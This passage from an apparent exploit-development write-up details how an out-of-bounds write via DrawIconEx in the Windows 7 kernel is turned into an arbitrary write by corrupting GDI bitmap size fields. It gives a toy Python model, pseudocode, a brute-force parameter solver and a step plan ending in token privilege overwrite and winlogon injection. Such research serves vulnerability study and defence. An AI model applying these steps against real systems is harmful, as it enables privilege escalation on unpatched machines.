Now that the capabilities of the OOB write are understood it is time to develop an exploitation strategy. The capabilities are a far cry from an all-powerful write-what-where; however, in situations like these I like to recall that it is possible to exploit a single byte NULL overflow.

At this point I strongly suggest reviewing/reading Abusing GDI Reloaded and Abusing GDI for ring0 exploit primitives. A brief explanation of these papers follows.

The SURFOBJ struct contains useful members such as pvScan0 and sizlBitmap. pvScan0 points to the actual bitmap data. This data can be read and written using GetBitmapBits and SetBitmapBits. sizlBitmap is two dwords that contain the width and height of the bitmap. Classically, two SURFOBJ structures are utilized. A write-what-where is used to overwrite the first SURFOBJ’s (referred to as Manager) pvScan0 with the address of the second SURFOBJ’s (referred to as Worker) pvScan0. This then allows a reusable/relocatable write-what-where primitive. The capabilities of this OOB write are listed as:

what is a value either bitwise OR'd or AND'd
where is a value >= fffff901'c7000240

Obviously this does not meet the classical requirements. Fortunately, there is another option taking advantage of sizlBitmap. On Windows 7 (and older versions of Windows 10) the SURFOBJs and their pvScan0 member contents are laid out contiguously. This means that if it is possible to increase either the width or height of sizlBitmap it will be possible to write out-of-bounds of the SURFOBJ’s pvScan0 using a call to SetBitmapBits. If a second SURFOBJ is allocated after the first SURFOBJ, this object’s pvScan0 address can be overwritten. This second SURFOBJ can then be used via SetBitmapBits for a powerful write-what-where primitive.
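The idea can be illustrated with a toy memory model. This is a sketch only: the 16-byte header (width, height, data pointer) is a made-up layout and not the real SURFOBJ, and set_bits is a stand-in for SetBitmapBits whose only bound is the size stored in the header.

```python
import struct

HDR = struct.Struct("<IIQ")   # toy header: width, height, pvScan0 (16 bytes)

def make_surface(mem, base, width, height):
    # pixel data is placed directly after the header
    HDR.pack_into(mem, base, width, height, base + HDR.size)
    return base

def set_bits(mem, base, payload):
    """Toy SetBitmapBits: bounded only by width * height from the header."""
    width, height, pv = HDR.unpack_from(mem, base)
    n = min(len(payload), width * height)
    mem[pv:pv + n] = payload[:n]
    return n

def demo():
    mem = bytearray(0x100)
    s1 = make_surface(mem, 0x00, 4, 4)   # data at 0x10..0x1f
    s2 = make_surface(mem, 0x20, 4, 4)   # header at 0x20, data at 0x30..0x3f
    # stand-in for the OOB write: OR a bit into s1's height
    height = struct.unpack_from("<I", mem, s1 + 4)[0]
    struct.pack_into("<I", mem, s1 + 4, height | 0x10)
    # a write through s1 now runs past its data into s2's header
    filler = b"\x00" * 16
    set_bits(mem, s1, filler + HDR.pack(4, 4, 0x80))
    # s2's data pointer now points wherever we chose
    set_bits(mem, s2, b"PWNED!")
    return bytes(mem[0x80:0x86])

print(demo())
```

A single OR into the size field is enough to turn the first surface into a tool for redirecting the second, which is why the restricted "what" of this bug is not a blocker.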

Taking all the information learned up to this point a rough exploitation strategy can be formulated.

1. Allocate a base bitmap (fffff900'c7000000).
2. Allocate enough SURFOBJs (via calls to CreateCompatibleBitmap) such that 
   one is allocated at fffff901'c7000000.
2.1. A second is allocated directly after the first.
2.2. A third is allocated directly after the second.
3. Calculate loop_iterations*lDelta such that oob_target is equal to fffff901'c7000240.
4. Use OOB write to overwrite width or height of second SURFOBJ's sizlBitmap.
5. Use SetBitmapBits with second SURFOBJ to overwrite pvScan0 of third SURFOBJ.
6. Arbitrary reusable write is now obtained.
7. Typical EoP overwrite process token privileges and inject into winlogon.exe.

A bad visual representation:

Every step is easily accomplished with the exception of step 4. The ‘what’ part of the write is not a problem. As seen earlier it is possible to perform a bitwise OR. An OR can only set bits, so the value can never decrease, which is what is required. Accurately targeting the width or height of sizlBitmap is the challenge. Recall from earlier in the post that oob_target is set via lea r14, [rcx + rax*4]. Up to this point, rax has been ignored. Now that an attack strategy is created, it is time to see how rax can be controlled to grant greater control of the OOB write.

Testing different parameters of DrawIconEx revealed that arg1 determines the value of rax. rax is then divided by 0x20:

This provides the ability to set an offset from the start of the lower 32 bits where

offset = (arg1 // 0x20 ) * 0x4 + 0x240

Testing arguments to DrawIconEx with breakpoints on both mov dword ptr [r14],esi instructions also uncovered useful information. arg2 of DrawIconEx controls the number of iterations through a loop where writes are performed on the bitmap data. For example, if 0x5 is passed as arg2, then 0x5 sets of writes are executed:

The difference between sets of writes is equivalent to an earlier variable, lDelta. This can be written in pseudo code as:

initial_value = 0xfffff901`c7000240 + (arg1 // 0x20) * 0x4;
loop_count = 0;
while(arg2) 
{
    write_location_1 = initial_value + lDelta * loop_count;
    write_location_2 = write_location_1 + 4;
    --arg2;
    ++loop_count;
}
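The same loop as a runnable Python generator, for experimenting with argument values. This is a sketch; the function name is hypothetical and the default base address is the example value used in this post.

```python
def write_locations(arg1, arg2, lDelta, base=0xfffff901c7000240):
    """Yield (write_location_1, write_location_2) for each set of writes."""
    initial_value = base + (arg1 // 0x20) * 0x4
    for loop_count in range(arg2):
        first = initial_value + lDelta * loop_count
        yield first, first + 4

for first, second in write_locations(arg1=0x40, arg2=3, lDelta=0xa2a0):
    print("%016x %016x" % (first, second))
```

Each additional pass moves both writes forward by lDelta, while arg1 shifts the starting point in 4-byte steps.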

Effectively, three values need to be solved for such that at some point through the loop write_location_1 and write_location_2 land on surfobj1’s sizlBitmap. The three values are arg1, arg2 and lDelta (width of bitmap // 8).

This can be bruteforced with ugly Python:

print("bruting function arguments...")

# start with size at 0x50000
for size in range(0x50000, 0xffffff):
    lDelta = size // 0x8
    # lDelta is always aligned so ignore if not (low nibble must be 0)
    if lDelta & 0x0f == 0:
        for arg1 in range(0x0, 0xfff, 0x20):
            offset = (arg1 // 0x20) * 0x4 + 0x240
            for arg2 in range(0x0, 0x10):
                write_target = offset + arg2 * lDelta
                if write_target == 0x70038:
                    print("found: size {:x}, offset (arg1) {:x}, lDelta {:x}, "
                          "loop_count (arg2) {:x}".format(size, arg1, lDelta, arg2))
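When the bitmap width is already fixed, the search collapses to a handful of checks. The sketch below solves the same equation for a single width, under the same assumptions as the brute force (target offset 0x70038, arg1 in steps of 0x20 below 0xfff, loop counts below 0x10); the function name is hypothetical.

```python
def solve_for_width(size, target=0x70038):
    """Return [(arg1, loop_count)] pairs that hit `target` for one width."""
    lDelta = size // 8
    if lDelta & 0x0f:              # same alignment filter as the brute force
        return []
    hits = []
    for loop_count in range(0x10):
        offset = target - loop_count * lDelta
        # offset must equal (arg1 // 0x20) * 4 + 0x240
        k, rem = divmod(offset - 0x240, 4)
        if rem == 0 and 0 <= k < 0x80:
            hits.append((k * 0x20, loop_count))
    return hits

for arg1, loop_count in solve_for_width(0x51500):
    print("arg1 {:x}, loop_count {:x}".format(arg1, loop_count))
```

For the width 0x51500 used throughout this post, the only pair that satisfies these formulas is arg1 = 0x8c0 with a loop count of 0xb.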

Now that all values are understood, all that remains is to write the exploit code.

Exploitation Code

Exploitation code is available on my GitHub. Demoing the exploit:

Windows 7 KB

Testing the exploit on Windows 7 has proved to be very reliable. However, there is room for improvement to make memory calculations completely generic. While testing, I found that a certain Windows KB modified the SURFOBJ struct slightly. Essentially, instead of the offset being 0x240 it is 0x238. Within the exploit code are 2 comments that mark what value to use depending on whether the Windows 7 host is pre- or post-KB. I have narrowed down the KBs and will update with the exact KB later.

Thanks to Netanel Ben-Simon, Yoav Alon and bee13oy for finding the bug: